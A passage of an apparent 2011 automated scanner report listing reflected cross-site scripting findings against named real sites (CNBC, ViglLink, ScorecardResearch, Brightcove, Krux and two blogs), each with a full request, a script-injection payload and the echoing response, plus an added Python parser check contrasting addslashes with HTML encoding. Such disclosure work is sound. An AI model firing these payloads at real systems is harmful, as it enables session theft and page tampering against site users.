Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:57:13 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:17:13 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 1975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Market Movers</title>
   <link rel='stylesheet' ty
...[SNIP]...
<div id="module" rowCount="3" chartType="gainers98f0d"><script>alert(1)</script>2d1497842a9">
...[SNIP]...

3.13. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/movers/movers.asp

Issue detail

The value of the rowCount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 467b2"><script>alert(1)</script>23b923cf03b was submitted in the rowCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/movers/movers.asp?chartType=gainers&rowCount=3467b2"><script>alert(1)</script>23b923cf03b&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:57:16 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:17:15 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 53613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Market Movers</title>
   <link rel='stylesheet' ty
...[SNIP]...
<div id="module" rowCount="3467b2"><script>alert(1)</script>23b923cf03b" chartType="gainers">
...[SNIP]...

3.14. http://api.viglink.com/api/ping [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3a9ec<script>alert(1)</script>4d02caaf2cd was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=021de175e1e571c67cfaeea3c68d72e8&loc=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&v=1&jsonp=vglnk_jsonp_131534117167203a9ec<script>alert(1)</script>4d02caaf2cd HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
Origin: http://www.readwriteweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://www.readwriteweb.com
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en-US
Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Sep 2011 15:33:39 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 160
Connection: keep-alive

vglnk_jsonp_131534117167203a9ec<script>alert(1)</script>4d02caaf2cd(1315323219590,2000,[],[],{"plugins":{},"timeClick":true,"debug":false,"timePing":false},[]);

3.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload b7be8<script>alert(1)</script>8499cdf77af was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2b7be8<script>alert(1)</script>8499cdf77af&c2=1000004&c3=&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:00:30 GMT
Date: Tue, 06 Sep 2011 15:00:30 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2b7be8<script>alert(1)</script>8499cdf77af", c2:"1000004", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.16. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload b8f5c<script>alert(1)</script>26c563a3d19 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=b8f5c<script>alert(1)</script>26c563a3d19&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"b8f5c<script>alert(1)</script>26c563a3d19", c15:"", c16:"", r:""});

3.17. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 3f055<script>alert(1)</script>215fffaf43b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15=3f055<script>alert(1)</script>215fffaf43b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
RE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"3f055<script>alert(1)</script>215fffaf43b", c16:"", r:""});

3.18. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 302ec<script>alert(1)</script>901d717b8ca was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693302ec<script>alert(1)</script>901d717b8ca&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:51 GMT
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693302ec<script>alert(1)</script>901d717b8ca", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.19. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d7c1e<script>alert(1)</script>9d9537f6b13 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1d7c1e<script>alert(1)</script>9d9537f6b13&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:51 GMT
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1d7c1e<script>alert(1)</script>9d9537f6b13", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.20. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 41993<script>alert(1)</script>fc7d8b09653 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F41993<script>alert(1)</script>fc7d8b09653&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:52 GMT
Date: Tue, 06 Sep 2011 15:32:52 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/41993<script>alert(1)</script>fc7d8b09653", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.21. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 56553<script>alert(1)</script>e3dfef08947 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=56553<script>alert(1)</script>e3dfef08947&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:52 GMT
Date: Tue, 06 Sep 2011 15:32:52 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"56553<script>alert(1)</script>e3dfef08947", c6:"", c10:"", c15:"", c16:"", r:""});

3.22. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload d95cf<script>alert(1)</script>677d9af4a8c was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=d95cf<script>alert(1)</script>677d9af4a8c&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"d95cf<script>alert(1)</script>677d9af4a8c", c10:"", c15:"", c16:"", r:""});



3.23. http://blog.harbottle.com/dm/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm/index.php

Issue detail

The payload 23d3a"><script>alert(1)</script>32285faa682 was supplied as a trailing path segment after /dm/index.php/ and is copied into the value of an HTML tag attribute (the href of the pagination link) which is encapsulated in double quotation marks. This input was echoed as 23d3a\"><script>alert(1)</script>32285faa682 in the application's response.

The backslash in front of the quotation mark is addslashes()-style escaping, consistent with magic_quotes_gpc on the PHP/4.3.9 build the server advertises. That escaping is meant for SQL or JavaScript string literals; an HTML parser gives a backslash no special meaning, so the quote still terminates the attribute value and the <script> tag that follows is parsed as markup. The correct defence is HTML attribute encoding at the point of output (" as &quot;, < as &lt;), not backslash escaping.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dm/index.php/23d3a"><script>alert(1)</script>32285faa682 HTTP/1.1
Host: blog.harbottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28771

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law</title>
<base href="http://blog.harbottle.com/dm/">
...[SNIP]...
<a href="http://blog.harbottle.com/dm/index.php/23d3a\"><script>alert(1)</script>32285faa682?paged=2">
...[SNIP]...

3.24. http://blog.ulf-wendel.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.ulf-wendel.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45b78"><script>alert(1)</script>06485f2279d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45b78\"><script>alert(1)</script>06485f2279d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
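
The following check reproduces the attribute-context problem behind 3.23 and 3.24 with Python's own HTML parser. It is an added example, not the scanner's output and not code from either blog: the template is a constructed stand-in for the pagination link both sites emit, blog.example is a placeholder host, and addslashes() is a re-implementation of the PHP escaping the responses show. It demonstrates that backslash-escaping the quote leaves a <script> start tag in the parsed document, while HTML attribute encoding does not and still delivers the original value in the href.

```python
"""Attribute-context check for findings 3.23 and 3.24 (an added example; not
the scanner's code and not the blogs' code). The template below is a
constructed stand-in for the pagination link both sites emit, and
blog.example is a placeholder host; the payload is the one from 3.23."""
from html import escape
from html.parser import HTMLParser

PAYLOAD = '23d3a"><script>alert(1)</script>32285faa682'   # payload from the report


def addslashes(value: str) -> str:
    """PHP-style addslashes(): the escaping the two servers applied (\\, ' and "
    get a backslash). Meant for SQL/JS string literals, not for HTML."""
    for ch in ("\\", "'", '"'):
        value = value.replace(ch, "\\" + ch)
    return value


def render_link(param_name: str, encoder) -> str:
    """Constructed template reproducing the vulnerable line: the supplied
    parameter name is echoed inside a double-quoted href."""
    return '<a href="http://blog.example/?%s=1&amp;paged=2">next</a>' % encoder(param_name)


class TagCollector(HTMLParser):
    """Collects every start tag with its (entity-decoded) attributes, i.e.
    what the browser's tree builder will see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup: str):
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def injects_script(markup: str) -> bool:
    """True when the rendered markup yields a <script> start tag."""
    return any(tag == "script" for tag, _ in parsed_tags(markup))


if __name__ == "__main__":
    for name, enc in (("addslashes", addslashes), ("html.escape", escape)):
        print("%-11s script injected: %s" % (name, injects_script(render_link(PAYLOAD, enc))))
```

Run stand-alone it prints one line per encoder. The parser, not a regular expression, decides whether a tag exists, which is the check to keep in a regression test: the backslash variant still yields a script tag, and the encoded variant yields a single <a> whose href carries the untouched payload as data.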

Request

GET /?45b78"><script>alert(1)</script>06485f2279d=1 HTTP/1.1
Host: blog.ulf-wendel.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:38 GMT
Server: Apache
X-Pingback: http://blog.ulf-wendel.de/xmlrpc.php
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="http://blog.ulf-wendel.de/?45b78\"><script>alert(1)</script>06485f2279d=1&amp;paged=2">
...[SNIP]...

3.25. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the response without encoding. The payload d2555<script>alert(1)</script>79d6c0d4362 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

Note the context: the request is a POST with content-type application/x-amf and the response is a binary AMF message (Content-Type: application/x-amf), not an HTML document. A browser does not render AMF as HTML, and a cross-origin XMLHttpRequest with a non-form content type is subject to a CORS preflight, so this is a missing-encoding finding in an API endpoint rather than a directly browser-exploitable reflected XSS; the impact depends on how the Flash player or other consumers of this message handle the reflected string.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAAFcSbzI~,OkyYKKfkn3za9MF0qI3Ufg1AerdkqfR3 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
Content-Length: 532
Origin: http://blogs.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Qa39efb8859c99888a16c5b96b94383131a9ffbbe
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:13:02 GMT
Server:
Content-Length: 3570

......../1/onResult......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
A........eAQ~~,AAAAAFcSbzI~,OkyYKKfkn3za9MF0qI3Ufg1AerdkqfR3.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..Bjz... ..ivideoPlayerd2555<script>alert(1)</script>79d6c0d4362..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

3.26. http://cdn.krxd.net/config/ [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.krxd.net
Path:   /config/

Issue detail

The value of the site request parameter is copied into the response without encoding. The payload b16f3<script>alert(1)</script>76bb110beda was submitted in the site parameter. This input was echoed unmodified in the application's response.

Note the context: the reflection is in a JSON error body ({"error": "..."}) returned with HTTP 404 and Content-Type: text/javascript, not in an HTML document, and the callback parameter (KRUX.configOnload) is not applied to the error response. A browser that honours the declared type will not render it as HTML, so direct exploitability rests on content sniffing (no X-Content-Type-Options: nosniff header is sent) or on a consumer that inserts the error string into a page without encoding. The server-side fix is the same either way: JSON-encode the value and escape < and > inside the string.

Request

GET /config/?pubid=d719e39d-e4be-4896-8d71-71012d0c51a0&site=cnbc.comb16f3<script>alert(1)</script>76bb110beda&callback=KRUX.configOnload HTTP/1.1
Host: cdn.krxd.net
